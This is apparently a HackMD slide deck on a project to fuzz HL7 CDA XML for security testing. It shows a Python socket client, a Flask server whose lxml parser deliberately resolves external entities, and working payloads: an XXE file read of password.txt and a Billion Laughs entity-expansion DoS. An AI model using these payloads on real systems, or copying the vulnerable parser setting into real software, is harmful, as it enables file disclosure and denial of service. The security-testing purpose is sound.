HL7 v3 & FHIR開發架構討論 - HackMD

<style> .reveal .slides { text-align: left; } .text-center{ text-align: center; //文字置中 } .text-left{ text-align: left; //文字靠左 } .text-right{ text-align: right; //文字靠右 } </style> # HL7 v3 & CDA 開發架構討論 #### Jimmy 2023/7/21 --- # Contents ```shell HL7 v3 & CDA 開發架構討論 ├── Goal ├── Schedule ├── Current Status ├── Discussion └── Reference ``` --- # Goal ---- ## Fuzz CDA R2 Syntax - Element - Tag - Value - Structure - Standard - Non-standard - Encode ---- - [C-CDA](http://www.hl7.org/ccdasearch/index.html) - [sample_ccdas](https://github.com/mdht/sample_ccdas/tree/master) --- # Schedule ---- ```shell . └── Schedule └── Timeline ``` ---- ## Timeline[🔗](https://jimmylala.notion.site/a7c7571ddba04d49919a2faab98de4f6?v=2eeec549cb8a460a98b539a77347ca0f&pvs=4) <img src="https://hackmd.io/_uploads/SkPbNdU9h.png" style="display:block; margin:auto;"> --- # Current Status ---- ```shell └── Current Status ├── XML Client (socket) ├── XML Server (Flask) │ └── Result ├── XML External Entities expansion │ ├── Payload │ └── Result ├── XML DoS - Billion Laughs │ └── Result └── XML DoS - Quadratic Blowup └── Result ``` ---- ## XML Client (socket) - Can Sent HTTP request byte code ```python= import socket def make_http_xml_request(url, method, ip, port, payload=""): http_request = f"""POST {url} HTTP/1.1\r Host: {ip}:{port}\r Content-Type: application/xml\r Content-Length: {len(payload)}\r \r {payload}""" return http_request def send_data_to_api_server(xml_data): # 建立socket連接到API伺服器 api_server_ip = "127.0.0.1" api_server_port = 5000 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((api_server_ip, api_server_port)) url = "/receive_data" # 構建HTTP請求 http_request = make_http_xml_request(url, "POST", api_server_ip, api_server_port, xml_data) print(http_request) # 發送HTTP請求到API伺服器 client_socket.sendall(http_request.encode()) # 接收伺服器回應 response = client_socket.recv(4096) print("Response from API server:") print(response.decode()) # 關閉socket連接 client_socket.close() if __name__ == "__main__": # 要發送的XML數據 xml_data = open("門診處方籤(藥囑).xml","r",encoding="utf-8").read() print(xml_data) # 調用函數發送數據到API伺服器 send_data_to_api_server(xml_data) ``` ---- ## XML Server (Flask) - Can received request. - Can print the received payload. ```python= from flask import Flask, request import lxml.etree as ET app = Flask(__name__) @app.route('/receive_data', methods=['POST']) def receive_data(): if request.method == 'POST': # 獲取POST請求的數據 xml_data = request.data # 這裡直接得到bytes物件，無需再進行decode print("Received XML data:") print(xml_data.decode()) # 將bytes轉換為字符串以打印 # 在這裡進行你的處理邏輯，你可以解析XML數據、儲存到數據庫等 try: parser = ET.XMLParser(resolve_entities=True) root = ET.fromstring(xml_data, parser=parser) # 在這裡可以繼續處理XML資料，例如： for child in root: print(child.tag, child.text) return str(root.text) , 200 except ET.ParseError as e: print("Can't parsing XML data", e) return "Can't parsing XML data, but can recevied data.", 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000, debug=True) ``` ---- ### Result ![](https://hackmd.io/_uploads/Byz3SvP92.png) ---- ## XML External Entities expansion ### Payload ```XML= <?xml version="1.0" encoding='UTF-8'?> <!DOCTYPE comment [ <!ELEMENT comment (#PCDATA)> <!ENTITY xxe SYSTEM "file:/password.txt"> ]> <comment> <text>&xxe;</text></comment> ``` ---- ### Result <img src="https://hackmd.io/_uploads/SklJJDwc3.png" style="display:block; margin:auto;"> ---- ## XML DoS - Billion Laughs - Exponential entity expansion - Multiple levels of nested entities ```xml= <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> ``` ---- ### Result <img src="https://hackmd.io/_uploads/Sym7yDPc3.png" style="display:block; margin:auto;"> ---- ### XML DoS - Quadratic Blowup - one large entity with a couple of thousand chars ![](https://hackmd.io/_uploads/rJvI8DP5h.png) ---- ### Result <img src="https://hackmd.io/_uploads/SJMWDwvc3.png" style="display:block; margin:auto;"> --- # Discussion ---- ```shell . └── Discussion ├── Syntax Fuzz └── Develope ``` ---- ## Syntax Fuzz - Don't know if the data has been successfully parsed. - Can we use the Taiwan standard? - After XML is attacked, how do we know we've been attacked successful? ---- ## Develope - Where shold we add code (dir)? - What code shold we implement? <img src="https://hackmd.io/_uploads/H1VOhOvc3.png" style="display:block; margin:auto;"> --- # Reference - [XML Vulnerabilities and Attacks cheatsheet](https://gist.github.com/jordanpotti/04c54f7de46f2f0f0b4e6b8e5f5b01b0)